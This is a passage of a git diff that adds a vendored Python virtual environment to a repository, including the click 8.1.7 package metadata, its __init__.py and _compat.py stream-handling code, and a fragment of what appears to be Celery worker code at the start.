+            'msgsnd': s.ru_msgsnd,
+            'msgrcv': s.ru_msgrcv,
+            'nsignals': s.ru_nsignals,
+            'nvcsw': s.ru_nvcsw,
+            'nivcsw': s.ru_nivcsw,
+        }
+
+    def stats(self):
+        info = self.info()
+        info.update(self.blueprint.info(self))
+        info.update(self.consumer.blueprint.info(self.consumer))
+        try:
+            info['rusage'] = self.rusage()
+        except NotImplementedError:
+            info['rusage'] = 'N/A'
+        return info
+
+    def __repr__(self):
+        """``repr(worker)``."""
+        return '<Worker: {self.hostname} ({state})>'.format(
+            self=self,
+            state=self.blueprint.human_state() if self.blueprint else 'INIT',
+        )
+
+    def __str__(self):
+        """``str(worker) == worker.hostname``."""
+        return self.hostname
+
+    @property
+    def state(self):
+        return state
+
+    def setup_defaults(self, concurrency=None, loglevel='WARN', logfile=None,
+                       task_events=None, pool=None, consumer_cls=None,
+                       timer_cls=None, timer_precision=None,
+                       autoscaler_cls=None,
+                       pool_putlocks=None,
+                       pool_restarts=None,
+                       optimization=None, O=None,  # O maps to -O=fair
+                       statedb=None,
+                       time_limit=None,
+                       soft_time_limit=None,
+                       scheduler=None,
+                       pool_cls=None,              # XXX use pool
+                       state_db=None,              # XXX use statedb
+                       task_time_limit=None,       # XXX use time_limit
+                       task_soft_time_limit=None,  # XXX use soft_time_limit
+                       scheduler_cls=None,         # XXX use scheduler
+                       schedule_filename=None,
+                       max_tasks_per_child=None,
+                       prefetch_multiplier=None, disable_rate_limits=None,
+                       worker_lost_wait=None,
+                       max_memory_per_child=None, **_kw):
+        either = self.app.either
+        self.loglevel = loglevel
+        self.logfile = logfile
+
+        self.concurrency = either('worker_concurrency', concurrency)
+        self.task_events = either('worker_send_task_events', task_events)
+        self.pool_cls = either('worker_pool', pool, pool_cls)
+        self.consumer_cls = either('worker_consumer', consumer_cls)
+        self.timer_cls = either('worker_timer', timer_cls)
+        self.timer_precision = either(
+            'worker_timer_precision', timer_precision,
+        )
+        self.optimization
= optimization or O + self.autoscaler_cls = either('worker_autoscaler', autoscaler_cls) + self.pool_putlocks = either('worker_pool_putlocks', pool_putlocks) + self.pool_restarts = either('worker_pool_restarts', pool_restarts) + self.statedb = either('worker_state_db', statedb, state_db) + self.schedule_filename = either( + 'beat_schedule_filename', schedule_filename, + ) + self.scheduler = either('beat_scheduler', scheduler, scheduler_cls) + self.time_limit = either( + 'task_time_limit', time_limit, task_time_limit) + self.soft_time_limit = either( + 'task_soft_time_limit', soft_time_limit, task_soft_time_limit, + ) + self.max_tasks_per_child = either( + 'worker_max_tasks_per_child', max_tasks_per_child, + ) + self.max_memory_per_child = either( + 'worker_max_memory_per_child', max_memory_per_child, + ) + self.prefetch_multiplier = int(either( + 'worker_prefetch_multiplier', prefetch_multiplier, + )) + self.disable_rate_limits = either( + 'worker_disable_rate_limits', disable_rate_limits, + ) + self.worker_lost_wait = either('worker_lost_wait', worker_lost_wait) diff --git a/env/Lib/site-packages/click-8.1.7.dist-info/INSTALLER b/env/Lib/site-packages/click-8.1.7.dist-info/INSTALLER new file mode 100644 index 00000000..a1b589e3 --- /dev/null +++ b/env/Lib/site-packages/click-8.1.7.dist-info/INSTALLER @@ -0,0 +1 @@ +pip diff --git a/env/Lib/site-packages/click-8.1.7.dist-info/LICENSE.rst b/env/Lib/site-packages/click-8.1.7.dist-info/LICENSE.rst new file mode 100644 index 00000000..d12a8491 --- /dev/null +++ b/env/Lib/site-packages/click-8.1.7.dist-info/LICENSE.rst @@ -0,0 +1,28 @@ +Copyright 2014 Pallets + +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions are +met: + +1. Redistributions of source code must retain the above copyright + notice, this list of conditions and the following disclaimer. + +2. Redistributions in binary form must reproduce the above copyright + notice, this list of conditions and the following disclaimer in the + documentation and/or other materials provided with the distribution. + +3. Neither the name of the copyright holder nor the names of its + contributors may be used to endorse or promote products derived from + this software without specific prior written permission. + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A +PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT +HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, +SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED +TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR +PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF +LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING +NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS +SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
diff --git a/env/Lib/site-packages/click-8.1.7.dist-info/METADATA b/env/Lib/site-packages/click-8.1.7.dist-info/METADATA new file mode 100644 index 00000000..7a6bbb24 --- /dev/null +++ b/env/Lib/site-packages/click-8.1.7.dist-info/METADATA @@ -0,0 +1,103 @@ +Metadata-Version: 2.1 +Name: click +Version: 8.1.7 +Summary: Composable command line interface toolkit +Home-page: https://palletsprojects.com/p/click/ +Maintainer: Pallets +Maintainer-email: contact@palletsprojects.com +License: BSD-3-Clause +Project-URL: Donate, https://palletsprojects.com/donate +Project-URL: Documentation, https://click.palletsprojects.com/ +Project-URL: Changes, https://click.palletsprojects.com/changes/ +Project-URL: Source Code, https://github.com/pallets/click/ +Project-URL: Issue Tracker, https://github.com/pallets/click/issues/ +Project-URL: Chat, https://discord.gg/pallets +Classifier: Development Status :: 5 - Production/Stable +Classifier: Intended Audience :: Developers +Classifier: License :: OSI Approved :: BSD License +Classifier: Operating System :: OS Independent +Classifier: Programming Language :: Python +Requires-Python: >=3.7 +Description-Content-Type: text/x-rst +License-File: LICENSE.rst +Requires-Dist: colorama ; platform_system == "Windows" +Requires-Dist: importlib-metadata ; python_version < "3.8" + +\$ click\_ +========== + +Click is a Python package for creating beautiful command line interfaces +in a composable way with as little code as necessary. It's the "Command +Line Interface Creation Kit". It's highly configurable but comes with +sensible defaults out of the box. + +It aims to make the process of writing command line tools quick and fun +while also preventing any frustration caused by the inability to +implement an intended CLI API. + +Click in three points: + +- Arbitrary nesting of commands +- Automatic help page generation +- Supports lazy loading of subcommands at runtime + + +Installing +---------- + +Install and update using `pip`_: + +.. code-block:: text + + $ pip install -U click + +.. _pip: https://pip.pypa.io/en/stable/getting-started/ + + +A Simple Example +---------------- + +.. code-block:: python + + import click + + @click.command() + @click.option("--count", default=1, help="Number of greetings.") + @click.option("--name", prompt="Your name", help="The person to greet.") + def hello(count, name): + """Simple program that greets NAME for a total of COUNT times.""" + for _ in range(count): + click.echo(f"Hello, {name}!") + + if __name__ == '__main__': + hello() + +.. code-block:: text + + $ python hello.py --count=3 + Your name: Click + Hello, Click! + Hello, Click! + Hello, Click! + + +Donate +------ + +The Pallets organization develops and supports Click and other popular +packages. In order to grow the community of contributors and users, and +allow the maintainers to devote more time to the projects, `please +donate today`_. + +.. 
_please donate today: https://palletsprojects.com/donate + + +Links +----- + +- Documentation: https://click.palletsprojects.com/ +- Changes: https://click.palletsprojects.com/changes/ +- PyPI Releases: https://pypi.org/project/click/ +- Source Code: https://github.com/pallets/click +- Issue Tracker: https://github.com/pallets/click/issues +- Chat: https://discord.gg/pallets diff --git a/env/Lib/site-packages/click-8.1.7.dist-info/RECORD b/env/Lib/site-packages/click-8.1.7.dist-info/RECORD new file mode 100644 index 00000000..7bc97df8 --- /dev/null +++ b/env/Lib/site-packages/click-8.1.7.dist-info/RECORD @@ -0,0 +1,39 @@ +click-8.1.7.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4 +click-8.1.7.dist-info/LICENSE.rst,sha256=morRBqOU6FO_4h9C9OctWSgZoigF2ZG18ydQKSkrZY0,1475 +click-8.1.7.dist-info/METADATA,sha256=qIMevCxGA9yEmJOM_4WHuUJCwWpsIEVbCPOhs45YPN4,3014 +click-8.1.7.dist-info/RECORD,, +click-8.1.7.dist-info/WHEEL,sha256=5sUXSg9e4bi7lTLOHcm6QEYwO5TIF1TNbTSVFVjcJcc,92 +click-8.1.7.dist-info/top_level.txt,sha256=J1ZQogalYS4pphY_lPECoNMfw0HzTSrZglC4Yfwo4xA,6 +click/__init__.py,sha256=YDDbjm406dTOA0V8bTtdGnhN7zj5j-_dFRewZF_pLvw,3138 +click/__pycache__/__init__.cpython-310.pyc,, +click/__pycache__/_compat.cpython-310.pyc,, +click/__pycache__/_termui_impl.cpython-310.pyc,, +click/__pycache__/_textwrap.cpython-310.pyc,, +click/__pycache__/_winconsole.cpython-310.pyc,, +click/__pycache__/core.cpython-310.pyc,, +click/__pycache__/decorators.cpython-310.pyc,, +click/__pycache__/exceptions.cpython-310.pyc,, +click/__pycache__/formatting.cpython-310.pyc,, +click/__pycache__/globals.cpython-310.pyc,, +click/__pycache__/parser.cpython-310.pyc,, +click/__pycache__/shell_completion.cpython-310.pyc,, +click/__pycache__/termui.cpython-310.pyc,, +click/__pycache__/testing.cpython-310.pyc,, +click/__pycache__/types.cpython-310.pyc,, +click/__pycache__/utils.cpython-310.pyc,, +click/_compat.py,sha256=5318agQpbt4kroKsbqDOYpTSWzL_YCZVUQiTT04yXmc,18744 +click/_termui_impl.py,sha256=3dFYv4445Nw-rFvZOTBMBPYwB1bxnmNk9Du6Dm_oBSU,24069 +click/_textwrap.py,sha256=10fQ64OcBUMuK7mFvh8363_uoOxPlRItZBmKzRJDgoY,1353 +click/_winconsole.py,sha256=5ju3jQkcZD0W27WEMGqmEP4y_crUVzPCqsX_FYb7BO0,7860 +click/core.py,sha256=j6oEWtGgGna8JarD6WxhXmNnxLnfRjwXglbBc-8jr7U,114086 +click/decorators.py,sha256=-ZlbGYgV-oI8jr_oH4RpuL1PFS-5QmeuEAsLDAYgxtw,18719 +click/exceptions.py,sha256=fyROO-47HWFDjt2qupo7A3J32VlpM-ovJnfowu92K3s,9273 +click/formatting.py,sha256=Frf0-5W33-loyY_i9qrwXR8-STnW3m5gvyxLVUdyxyk,9706 +click/globals.py,sha256=TP-qM88STzc7f127h35TD_v920FgfOD2EwzqA0oE8XU,1961 +click/parser.py,sha256=LKyYQE9ZLj5KgIDXkrcTHQRXIggfoivX14_UVIn56YA,19067 +click/py.typed,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0 +click/shell_completion.py,sha256=Ty3VM_ts0sQhj6u7eFTiLwHPoTgcXTGEAUg2OpLqYKw,18460 +click/termui.py,sha256=H7Q8FpmPelhJ2ovOhfCRhjMtCpNyjFXryAMLZODqsdc,28324 +click/testing.py,sha256=1Qd4kS5bucn1hsNIRryd0WtTMuCpkA93grkWxT8POsU,16084 +click/types.py,sha256=TZvz3hKvBztf-Hpa2enOmP4eznSPLzijjig5b_0XMxE,36391 +click/utils.py,sha256=1476UduUNY6UePGU4m18uzVHLt1sKM2PP3yWsQhbItM,20298 diff --git a/env/Lib/site-packages/click-8.1.7.dist-info/WHEEL b/env/Lib/site-packages/click-8.1.7.dist-info/WHEEL new file mode 100644 index 00000000..2c08da08 --- /dev/null +++ b/env/Lib/site-packages/click-8.1.7.dist-info/WHEEL @@ -0,0 +1,5 @@ +Wheel-Version: 1.0 +Generator: bdist_wheel (0.41.1) +Root-Is-Purelib: true +Tag: py3-none-any + diff --git a/env/Lib/site-packages/click-8.1.7.dist-info/top_level.txt 
b/env/Lib/site-packages/click-8.1.7.dist-info/top_level.txt new file mode 100644 index 00000000..dca9a909 --- /dev/null +++ b/env/Lib/site-packages/click-8.1.7.dist-info/top_level.txt @@ -0,0 +1 @@ +click diff --git a/env/Lib/site-packages/click/__init__.py b/env/Lib/site-packages/click/__init__.py new file mode 100644 index 00000000..9a1dab04 --- /dev/null +++ b/env/Lib/site-packages/click/__init__.py @@ -0,0 +1,73 @@ +""" +Click is a simple Python module inspired by the stdlib optparse to make +writing command line scripts fun. Unlike other modules, it's based +around a simple API that does not come with too much magic and is +composable. +""" +from .core import Argument as Argument +from .core import BaseCommand as BaseCommand +from .core import Command as Command +from .core import CommandCollection as CommandCollection +from .core import Context as Context +from .core import Group as Group +from .core import MultiCommand as MultiCommand +from .core import Option as Option +from .core import Parameter as Parameter +from .decorators import argument as argument +from .decorators import command as command +from .decorators import confirmation_option as confirmation_option +from .decorators import group as group +from .decorators import help_option as help_option +from .decorators import make_pass_decorator as make_pass_decorator +from .decorators import option as option +from .decorators import pass_context as pass_context +from .decorators import pass_obj as pass_obj +from .decorators import password_option as password_option +from .decorators import version_option as version_option +from .exceptions import Abort as Abort +from .exceptions import BadArgumentUsage as BadArgumentUsage +from .exceptions import BadOptionUsage as BadOptionUsage +from .exceptions import BadParameter as BadParameter +from .exceptions import ClickException as ClickException +from .exceptions import FileError as FileError +from .exceptions import MissingParameter as MissingParameter +from .exceptions import NoSuchOption as NoSuchOption +from .exceptions import UsageError as UsageError +from .formatting import HelpFormatter as HelpFormatter +from .formatting import wrap_text as wrap_text +from .globals import get_current_context as get_current_context +from .parser import OptionParser as OptionParser +from .termui import clear as clear +from .termui import confirm as confirm +from .termui import echo_via_pager as echo_via_pager +from .termui import edit as edit +from .termui import getchar as getchar +from .termui import launch as launch +from .termui import pause as pause +from .termui import progressbar as progressbar +from .termui import prompt as prompt +from .termui import secho as secho +from .termui import style as style +from .termui import unstyle as unstyle +from .types import BOOL as BOOL +from .types import Choice as Choice +from .types import DateTime as DateTime +from .types import File as File +from .types import FLOAT as FLOAT +from .types import FloatRange as FloatRange +from .types import INT as INT +from .types import IntRange as IntRange +from .types import ParamType as ParamType +from .types import Path as Path +from .types import STRING as STRING +from .types import Tuple as Tuple +from .types import UNPROCESSED as UNPROCESSED +from .types import UUID as UUID +from .utils import echo as echo +from .utils import format_filename as format_filename +from .utils import get_app_dir as get_app_dir +from .utils import get_binary_stream as get_binary_stream +from .utils import get_text_stream as 
get_text_stream +from .utils import open_file as open_file + +__version__ = "8.1.7" diff --git a/env/Lib/site-packages/click/_compat.py b/env/Lib/site-packages/click/_compat.py new file mode 100644 index 00000000..23f88665 --- /dev/null +++ b/env/Lib/site-packages/click/_compat.py @@ -0,0 +1,623 @@ +import codecs +import io +import os +import re +import sys +import typing as t +from weakref import WeakKeyDictionary + +CYGWIN = sys.platform.startswith("cygwin") +WIN = sys.platform.startswith("win") +auto_wrap_for_ansi: t.Optional[t.Callable[[t.TextIO], t.TextIO]] = None +_ansi_re = re.compile(r"\033\[[;?0-9]*[a-zA-Z]") + + +def _make_text_stream( + stream: t.BinaryIO, + encoding: t.Optional[str], + errors: t.Optional[str], + force_readable: bool = False, + force_writable: bool = False, +) -> t.TextIO: + if encoding is None: + encoding = get_best_encoding(stream) + if errors is None: + errors = "replace" + return _NonClosingTextIOWrapper( + stream, + encoding, + errors, + line_buffering=True, + force_readable=force_readable, + force_writable=force_writable, + ) + + +def is_ascii_encoding(encoding: str) -> bool: + """Checks if a given encoding is ascii.""" + try: + return codecs.lookup(encoding).name == "ascii" + except LookupError: + return False + + +def get_best_encoding(stream: t.IO[t.Any]) -> str: + """Returns the default stream encoding if not found.""" + rv = getattr(stream, "encoding", None) or sys.getdefaultencoding() + if is_ascii_encoding(rv): + return "utf-8" + return rv + + +class _NonClosingTextIOWrapper(io.TextIOWrapper): + def __init__( + self, + stream: t.BinaryIO, + encoding: t.Optional[str], + errors: t.Optional[str], + force_readable: bool = False, + force_writable: bool = False, + **extra: t.Any, + ) -> None: + self._stream = stream = t.cast( + t.BinaryIO, _FixupStream(stream, force_readable, force_writable) + ) + super().__init__(stream, encoding, errors, **extra) + + def __del__(self) -> None: + try: + self.detach() + except Exception: + pass + + def isatty(self) -> bool: + # https://bitbucket.org/pypy/pypy/issue/1803 + return self._stream.isatty() + + +class _FixupStream: + """The new io interface needs more from streams than streams + traditionally implement. As such, this fix-up code is necessary in + some circumstances. + + The forcing of readable and writable flags are there because some tools + put badly patched objects on sys (one such offender are certain version + of jupyter notebook). 
+ """ + + def __init__( + self, + stream: t.BinaryIO, + force_readable: bool = False, + force_writable: bool = False, + ): + self._stream = stream + self._force_readable = force_readable + self._force_writable = force_writable + + def __getattr__(self, name: str) -> t.Any: + return getattr(self._stream, name) + + def read1(self, size: int) -> bytes: + f = getattr(self._stream, "read1", None) + + if f is not None: + return t.cast(bytes, f(size)) + + return self._stream.read(size) + + def readable(self) -> bool: + if self._force_readable: + return True + x = getattr(self._stream, "readable", None) + if x is not None: + return t.cast(bool, x()) + try: + self._stream.read(0) + except Exception: + return False + return True + + def writable(self) -> bool: + if self._force_writable: + return True + x = getattr(self._stream, "writable", None) + if x is not None: + return t.cast(bool, x()) + try: + self._stream.write("") # type: ignore + except Exception: + try: + self._stream.write(b"") + except Exception: + return False + return True + + def seekable(self) -> bool: + x = getattr(self._stream, "seekable", None) + if x is not None: + return t.cast(bool, x()) + try: + self._stream.seek(self._stream.tell()) + except Exception: + return False + return True + + +def _is_binary_reader(stream: t.IO[t.Any], default: bool = False) -> bool: + try: + return isinstance(stream.read(0), bytes) + except Exception: + return default + # This happens in some cases where the stream was already + # closed. In this case, we assume the default. + + +def _is_binary_writer(stream: t.IO[t.Any], default: bool = False) -> bool: + try: + stream.write(b"") + except Exception: + try: + stream.write("") + return False + except Exception: + pass + return default + return True + + +def _find_binary_reader(stream: t.IO[t.Any]) -> t.Optional[t.BinaryIO]: + # We need to figure out if the given stream is already binary. + # This can happen because the official docs recommend detaching + # the streams to get binary streams. Some code might do this, so + # we need to deal with this case explicitly. + if _is_binary_reader(stream, False): + return t.cast(t.BinaryIO, stream) + + buf = getattr(stream, "buffer", None) + + # Same situation here; this time we assume that the buffer is + # actually binary in case it's closed. + if buf is not None and _is_binary_reader(buf, True): + return t.cast(t.BinaryIO, buf) + + return None + + +def _find_binary_writer(stream: t.IO[t.Any]) -> t.Optional[t.BinaryIO]: + # We need to figure out if the given stream is already binary. + # This can happen because the official docs recommend detaching + # the streams to get binary streams. Some code might do this, so + # we need to deal with this case explicitly. + if _is_binary_writer(stream, False): + return t.cast(t.BinaryIO, stream) + + buf = getattr(stream, "buffer", None) + + # Same situation here; this time we assume that the buffer is + # actually binary in case it's closed. + if buf is not None and _is_binary_writer(buf, True): + return t.cast(t.BinaryIO, buf) + + return None + + +def _stream_is_misconfigured(stream: t.TextIO) -> bool: + """A stream is misconfigured if its encoding is ASCII.""" + # If the stream does not have an encoding set, we assume it's set + # to ASCII. This appears to happen in certain unittest + # environments. It's not quite clear what the correct behavior is + # but this at least will force Click to recover somehow. 
+ return is_ascii_encoding(getattr(stream, "encoding", None) or "ascii") + + +def _is_compat_stream_attr(stream: t.TextIO, attr: str, value: t.Optional[str]) -> bool: + """A stream attribute is compatible if it is equal to the + desired value or the desired value is unset and the attribute + has a value. + """ + stream_value = getattr(stream, attr, None) + return stream_value == value or (value is None and stream_value is not None) + + +def _is_compatible_text_stream( + stream: t.TextIO, encoding: t.Optional[str], errors: t.Optional[str] +) -> bool: + """Check if a stream's encoding and errors attributes are + compatible with the desired values. + """ + return _is_compat_stream_attr( + stream, "encoding", encoding + ) and _is_compat_stream_attr(stream, "errors", errors) + + +def _force_correct_text_stream( + text_stream: t.IO[t.Any], + encoding: t.Optional[str], + errors: t.Optional[str], + is_binary: t.Callable[[t.IO[t.Any], bool], bool], + find_binary: t.Callable[[t.IO[t.Any]], t.Optional[t.BinaryIO]], + force_readable: bool = False, + force_writable: bool = False, +) -> t.TextIO: + if is_binary(text_stream, False): + binary_reader = t.cast(t.BinaryIO, text_stream) + else: + text_stream = t.cast(t.TextIO, text_stream) + # If the stream looks compatible, and won't default to a + # misconfigured ascii encoding, return it as-is. + if _is_compatible_text_stream(text_stream, encoding, errors) and not ( + encoding is None and _stream_is_misconfigured(text_stream) + ): + return text_stream + + # Otherwise, get the underlying binary reader. + possible_binary_reader = find_binary(text_stream) + + # If that's not possible, silently use the original reader + # and get mojibake instead of exceptions. + if possible_binary_reader is None: + return text_stream + + binary_reader = possible_binary_reader + + # Default errors to replace instead of strict in order to get + # something that works. + if errors is None: + errors = "replace" + + # Wrap the binary stream in a text stream with the correct + # encoding parameters. 
+ return _make_text_stream( + binary_reader, + encoding, + errors, + force_readable=force_readable, + force_writable=force_writable, + ) + + +def _force_correct_text_reader( + text_reader: t.IO[t.Any], + encoding: t.Optional[str], + errors: t.Optional[str], + force_readable: bool = False, +) -> t.TextIO: + return _force_correct_text_stream( + text_reader, + encoding, + errors, + _is_binary_reader, + _find_binary_reader, + force_readable=force_readable, + ) + + +def _force_correct_text_writer( + text_writer: t.IO[t.Any], + encoding: t.Optional[str], + errors: t.Optional[str], + force_writable: bool = False, +) -> t.TextIO: + return _force_correct_text_stream( + text_writer, + encoding, + errors, + _is_binary_writer, + _find_binary_writer, + force_writable=force_writable, + ) + + +def get_binary_stdin() -> t.BinaryIO: + reader = _find_binary_reader(sys.stdin) + if reader is None: + raise RuntimeError("Was not able to determine binary stream for sys.stdin.") + return reader + + +def get_binary_stdout() -> t.BinaryIO: + writer = _find_binary_writer(sys.stdout) + if writer is None: + raise RuntimeError("Was not able to determine binary stream for sys.stdout.") + return writer + + +def get_binary_stderr() -> t.BinaryIO: + writer = _find_binary_writer(sys.stderr) + if writer is None: + raise RuntimeError("Was not able to determine binary stream for sys.stderr.") + return writer + + +def get_text_stdin( + encoding: t.Optional[str] = None, errors: t.Optional[str] = None +) -> t.TextIO: + rv = _get_windows_console_stream(sys.stdin, encoding, errors) + if rv is not None: + return rv + return _force_correct_text_reader(sys.stdin, encoding, errors, force_readable=True) + + +def get_text_stdout( + encoding: t.Optional[str] = None, errors: t.Optional[str] = None +) -> t.TextIO: + rv = _get_windows_console_stream(sys.stdout, encoding, errors) + if rv is not None: + return rv + return _force_correct_text_writer(sys.stdout, encoding, errors, force_writable=True) + + +def get_text_stderr( + encoding: t.Optional[str] = None, errors: t.Optional[str] = None +) -> t.TextIO: + rv = _get_windows_console_stream(sys.stderr, encoding, errors) + if rv is not None: + return rv + return _force_correct_text_writer(sys.stderr, encoding, errors, force_writable=True) + + +def _wrap_io_open( + file: t.Union[str, "os.PathLike[str]", int], + mode: str, + encoding: t.Optional[str], + errors: t.Optional[str], +) -> t.IO[t.Any]: + """Handles not passing ``encoding`` and ``errors`` in binary mode.""" + if "b" in mode: + return open(file, mode) + + return open(file, mode, encoding=encoding, errors=errors) + + +def open_stream( + filename: "t.Union[str, os.PathLike[str]]", + mode: str = "r", + encoding: t.Optional[str] = None, + errors: t.Optional[str] = "strict", + atomic: bool = False, +) -> t.Tuple[t.IO[t.Any], bool]: + binary = "b" in mode + filename = os.fspath(filename) + + # Standard streams first. These are simple because they ignore the + # atomic flag. Use fsdecode to handle Path("-"). + if os.fsdecode(filename) == "-": + if any(m in mode for m in ["w", "a", "x"]): + if binary: + return get_binary_stdout(), False + return get_text_stdout(encoding=encoding, errors=errors), False + if binary: + return get_binary_stdin(), False + return get_text_stdin(encoding=encoding, errors=errors), False + + # Non-atomic writes directly go out through the regular open functions. 
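+    # ``open_stream`` returns a ``(stream, should_close)`` pair: the standard
+    # streams above are returned with ``False``, real files with ``True``.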
+ if not atomic: + return _wrap_io_open(filename, mode, encoding, errors), True + + # Some usability stuff for atomic writes + if "a" in mode: + raise ValueError( + "Appending to an existing file is not supported, because that" + " would involve an expensive `copy`-operation to a temporary" + " file. Open the file in normal `w`-mode and copy explicitly" + " if that's what you're after." + ) + if "x" in mode: + raise ValueError("Use the `overwrite`-parameter instead.") + if "w" not in mode: + raise ValueError("Atomic writes only make sense with `w`-mode.") + + # Atomic writes are more complicated. They work by opening a file + # as a proxy in the same folder and then using the fdopen + # functionality to wrap it in a Python file. Then we wrap it in an + # atomic file that moves the file over on close. + import errno + import random + + try: + perm: t.Optional[int] = os.stat(filename).st_mode + except OSError: + perm = None + + flags = os.O_RDWR | os.O_CREAT | os.O_EXCL + + if binary: + flags |= getattr(os, "O_BINARY", 0) + + while True: + tmp_filename = os.path.join( + os.path.dirname(filename), + f".__atomic-write{random.randrange(1 << 32):08x}", + ) + try: + fd = os.open(tmp_filename, flags, 0o666 if perm is None else perm) + break + except OSError as e: + if e.errno == errno.EEXIST or ( + os.name == "nt" + and e.errno == errno.EACCES + and os.path.isdir(e.filename) + and os.access(e.filename, os.W_OK) + ): + continue + raise + + if perm is not None: + os.chmod(tmp_filename, perm) # in case perm includes bits in umask + + f = _wrap_io_open(fd, mode, encoding, errors) + af = _AtomicFile(f, tmp_filename, os.path.realpath(filename)) + return t.cast(t.IO[t.Any], af), True + + +class _AtomicFile: + def __init__(self, f: t.IO[t.Any], tmp_filename: str, real_filename: str) -> None: + self._f = f + self._tmp_filename = tmp_filename + self._real_filename = real_filename + self.closed = False + + @property + def name(self) -> str: + return self._real_filename + + def close(self, delete: bool = False) -> None: + if self.closed: + return + self._f.close() + os.replace(self._tmp_filename, self._real_filename) + self.closed = True + + def __getattr__(self, name: str) -> t.Any: + return getattr(self._f, name) + + def __enter__(self) -> "_AtomicFile": + return self + + def __exit__(self, exc_type: t.Optional[t.Type[BaseException]], *_: t.Any) -> None: + self.close(delete=exc_type is not None) + + def __repr__(self) -> str: + return repr(self._f) + + +def strip_ansi(value: str) -> str: + return _ansi_re.sub("", value) + + +def _is_jupyter_kernel_output(stream: t.IO[t.Any]) -> bool: + while isinstance(stream, (_FixupStream, _NonClosingTextIOWrapper)): + stream = stream._stream + + return stream.__class__.__module__.startswith("ipykernel.") + + +def should_strip_ansi( + stream: t.Optional[t.IO[t.Any]] = None, color: t.Optional[bool] = None +) -> bool: + if color is None: + if stream is None: + stream = sys.stdin + return not isatty(stream) and not _is_jupyter_kernel_output(stream) + return not color + + +# On Windows, wrap the output streams with colorama to support ANSI +# color codes. 
+# NOTE: double check is needed so mypy does not analyze this on Linux +if sys.platform.startswith("win") and WIN: + from ._winconsole import _get_windows_console_stream + + def _get_argv_encoding() -> str: + import locale + + return locale.getpreferredencoding() + + _ansi_stream_wrappers: t.MutableMapping[t.TextIO, t.TextIO] = WeakKeyDictionary() + + def auto_wrap_for_ansi( # noqa: F811 + stream: t.TextIO, color: t.Optional[bool] = None + ) -> t.TextIO: + """Support ANSI color and style codes on Windows by wrapping a + stream with colorama. + """ + try: + cached = _ansi_stream_wrappers.get(stream) + except Exception: + cached = None + + if cached is not None: + return cached + + import colorama + + strip = should_strip_ansi(stream, color) + ansi_wrapper = colorama.AnsiToWin32(stream, strip=strip) + rv = t.cast(t.TextIO, ansi_wrapper.stream) + _write = rv.write + + def _safe_write(s): + try: + return _write(s) + except BaseException: + ansi_wrapper.reset_all() + raise + + rv.write = _safe_write + + try: + _ansi_stream_wrappers[stream] = rv + except Exception: + pass + + return rv + +else: + + def _get_argv_encoding() -> str: + return getattr(sys.stdin, "encoding", None) or sys.getfilesystemencoding() + + def _get_windows_console_stream( + f: t.TextIO, encoding: t.Optional[str], errors: t.Optional[str] + ) -> t.Optional[t.TextIO]: + return None + + +def term_len(x: str) -> int: + return len(strip_ansi(x)) + + +def isatty(stream: t.IO[t.Any]) -> bool: + try: + return stream.isatty() + except Exception: + return False + + +def _make_cached_stream_func( + src_func: t.Callable[[], t.Optional[t.TextIO]], + wrapper_func: t.Callable[[], t.TextIO], +) -> t.Callable[[], t.Optional[t.TextIO]]: + cache: t.MutableMapping[t.TextIO, t.TextIO] = WeakKeyDictionary() + + def func() -> t.Optional[t.TextIO]: + stream = src_func() + + if stream is None: + return None + + try: + rv = cache.get(stream) + except Exception: + rv = None + if rv is not None: + return rv + rv = wrapper_func() + try: + cache[stream] = rv + except Exception: + pass + return rv + + return func + + +_default_text_stdin = _make_cached_stream_func(lambda: sys.stdin, get_text_stdin) +_default_text_stdout = _make_cached_stream_func(lambda: sys.stdout, get_text_stdout) +_default_text_stderr = _make_cached_stream_func(lambda: sys.stderr, get_text_stderr) + + +binary_streams: t.Mapping[str, t.Callable[[], t.BinaryIO]] = { + "stdin": get_binary_stdin, + "stdout": get_binary_stdout, + "stderr": get_binary_stderr, +} + +text_streams: t.Mapping[ + str, t.Callable[[t.Optional[str], t.Optional[str]], t.TextIO] +] = { + "stdin": get_text_stdin, + "stdout": get_text_stdout, + "stderr": get_text_stderr, +} diff --git a/env/Lib/site-packages/click/_termui_impl.py b/env/Lib/site-packages/click/_termui_impl.py new file mode 100644 index 00000000..f7446577 --- /dev/null +++ b/env/Lib/site-packages/click/_termui_impl.py @@ -0,0 +1,739 @@ +""" +This module contains implementations for the termui module. To keep the +import time of Click down, some infrequently used functionality is +placed in this module and only imported as needed. 
